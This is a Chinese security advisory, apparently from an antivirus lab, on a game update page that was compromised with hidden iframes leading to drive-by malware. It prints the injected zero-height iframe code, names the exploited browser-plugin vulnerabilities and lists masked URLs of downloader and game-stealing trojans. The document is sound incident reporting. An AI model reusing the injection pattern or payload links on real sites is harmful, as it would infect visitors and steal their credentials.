天龙八部游戏网站挂马事件

8月7日，安天实验室发现，天龙八部游戏网站 (http://update.tl.sohu.com/tlbb/readme.htm)被黑客植入病毒，用户如果访问该网站，系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。
　　天龙八部更新公告页面(http://update.tl.sohu.com/tlbb/readme.htm)多次被黑客植入恶意代码,从8月初到现在已经被挂马3次。
　　从http://www.t****.cn/a0208291/a20.htm至http://www.t****.cn/a0208291/a20.htm均为挂马页面。
　　该网站问题代码：

<iframe src=" http://www.t****.cn/a0208291/a20.htm" width="100" height="0"></iframe>
http://www.t****.cn/a0208291/a20.htm问题框架代码：

<iframe width=100 height=0 src=new.html></iframe>
http://www.t****.cn/a0208291/new.html网马代码：

以上加密网马解密后可知利用以下漏洞来传播：
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
Adobe Flash Player SWF文件漏洞
暴风影音II mps.dll ActiveX栈溢出漏洞
当用户访问http://up****.tl.sohu.com/tlbb/readme.htm时，系统会自动下载以下病毒文件：
http://cdn.e5****.com/upkk.exe           病毒名：(Trojan-Downloader.Win32.Agent.wps)
http://cdn.e5****.com/up01.exe           病毒名：(Trojan.Win32.Agent.xqr)
http://cdn.e5****.com/up01B.exe          病毒名：(Trojan-GameThief.Win32.OnLineGames.snpn)
http://cdn.e5****.com/up02.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.snvk)
http://cdn.e5****.com/up02B.exe          病毒名：(Trojan-GameThief.Win32.OnLineGames.snry)
http://cdn.e5****.com/up03B.exe          病毒名：(Trojan-GameThief.Win32.OnLineGames.snyb)
http://cdn.e5****.com/up05.exe           病毒名：(Trojan-Downloader.Win32.Zlob.sab)
http://cdn.e5****.com/up06.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up07.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.snvj)
http://cdn.e5****.com/up08.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up10.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.shig)
http://cdn.e5****.com/up11.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.soir)
http://cdn.e5****.com/up12.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/up13.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.snpv)
http://cdn.e5****.com/up14.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.slae)
http://cdn.e5****.com/up15.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.slae)
http://cdn.e5****.com/up16.exe           病毒名：(Trojan-PSW.Win32.Agent.nr)
http://cdn.e5****.com/up17.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.soit)
http://cdn.e5****.com/up18.exe           病毒名：(Trojan.Win32.Agent.sav)
http://cdn.e5****.com/up19.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up20.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.snpw)
http://cdn.e5****.com/up21.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/up22.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.soit)
http://cdn.e5****.com/up23.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.shhw)
http://cdn.e5****.com/up24.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.shhw)
http://cdn.e5****.com/up25.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up26.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up27.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.snnq)
http://cdn.e5****.com/up28.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.smjn)
http://cdn.e5****.com/up29.exe           病毒名：(Trojan-GameThief.Win32.OnLineGames.snvl)
http://cdn.e5****.com/tzt.exe            病毒名：(Trojan-Downloader.Win32.Agent.wps)

    以上病毒文件为下载者木马和游戏盗号木马，自动运行后将会，盗取用户敏感信息，甚至导致死机。由于下载数量太多，这里不一一分析。

上一篇：没有了   下一篇：Trojan-Downloader.Win32.Agent.yko(302fcc88b1.dll ,f218f4fbb2.dll )分析

用户名(必填) 新注册

密码(必填)匿名评论